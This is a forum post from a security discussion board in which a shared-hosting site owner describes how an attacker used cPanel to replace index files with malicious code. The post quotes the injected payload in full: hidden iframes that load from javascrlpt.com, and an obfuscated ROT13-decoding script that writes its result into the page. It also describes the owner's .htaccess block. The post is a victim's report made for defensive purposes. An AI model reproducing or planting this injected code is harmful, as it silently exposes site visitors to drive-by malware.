• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

my web server was hacked by a user of javascrlpt.com

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Spyware // Adware // Trojans Discussion

View previous topic :: View next topic  
Author Message
New Computer
Just Arrived
Just Arrived


Joined: 06 May 2006
Posts: 0
Location: Birmingham (UK)

Offline

PostPosted: Tue Jan 27, 2009 12:36 pm    Post subject: my web server was hacked by a user of javascrlpt.com Reply with quote

basically, sunday night they came in via cpanel (presumably after hacking my master user password) via the following IPs:
94.75.221.113
62.33.71.85

They uploaded and then deleted "myfile.txt" a couple of times...

They also had a look at my webalizer stats... generated automatically with my hostgator shared hosting package...

Then they came back monday morning and replaced all of my index files from the top-level directories within the web root... with copies that contain a nasty script.

any of my index files were blajnk so they got nothing but the malicious content, and here's an example:

Code:
<iframe cguqw='vy6egGvf' myqxs='DvCiJn4o' src='http://javascrlpt.com/vb/in.cgi?2 ' scrtr='pzfYbvS4' uentc='Dvg1u35U' kbsxt='rAyLwf0Q' width='546' height='520' style='display:none'></iframe> <iframe cguqw='vy6egGvf' myqxs='DvCiJn4o' src='http://javascrlpt.com/vb/in.cgi?2 ' scrtr='pzfYbvS4' uentc='Dvg1u35U' kbsxt='rAyLwf0Q' width='546' height='520' style='display:none'></iframe> <SCRIPT>var KCnLhhEQ9SQBH='';var Q6F0s8d1LkW2vwVsy0go='reuav1g122rqRn2Pf2ne3%u0Qz2%/ %%gnpp%%g2b%2r s3%t.a22r2023%03pNr/%q%%223%R %2c.rS0Qt3ee%v v0gba.232%se03 nQ/ymv22u%o%2s e%3bytv%v1nQ3z z2/tv0j2u%%rPe%';var KeYJ4UImAom7='241638790556104837291026538497386974510280751326493628741509273165984012654370890461938572951742860394365810725096248731612758043915790823649036281745';var d='';for(var yC66lJ7K5IzrEt5CKJDG=0;yC66lJ7K5IzrEt5CKJDG<15;yC66lJ7K5IzrEt5CKJDG++) for(var IkYF2W3jEs=0;IkYF2W3jEs<10;IkYF2W3jEs++) {d=Q6F0s8d1LkW2vwVsy0go.charCodeAt((parseInt(KeYJ4UImAom7.charAt(yC66lJ7K5IzrEt5CKJDG*10+IkYF2W3jEs))*15)+yC66lJ7K5IzrEt5CKJDG); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;KCnLhhEQ9SQBH+=String.fromCharCode(d);}document.write(unescape(KCnLhhEQ9SQBH));</SCRIPT>


apparently javascrlpt.com was registered only a couple of weeks ago... and has been implicated in association with trojans...

i shut down the whole domain pretty quickly via a htaccess file in the web root as follows:
Code:
order deny,allow
deny from all


before doing this though, i actually dared to load up a file to see what this script would do, and it seemed to0 request information from some domain or subdomain with "sextracker" in the url

...i guess it could have been a lot worse if i didn't notice a strange large index file in the parent of the web root, modified just a few minutes before when i noticed it!
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Spyware // Adware // Trojans Discussion All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register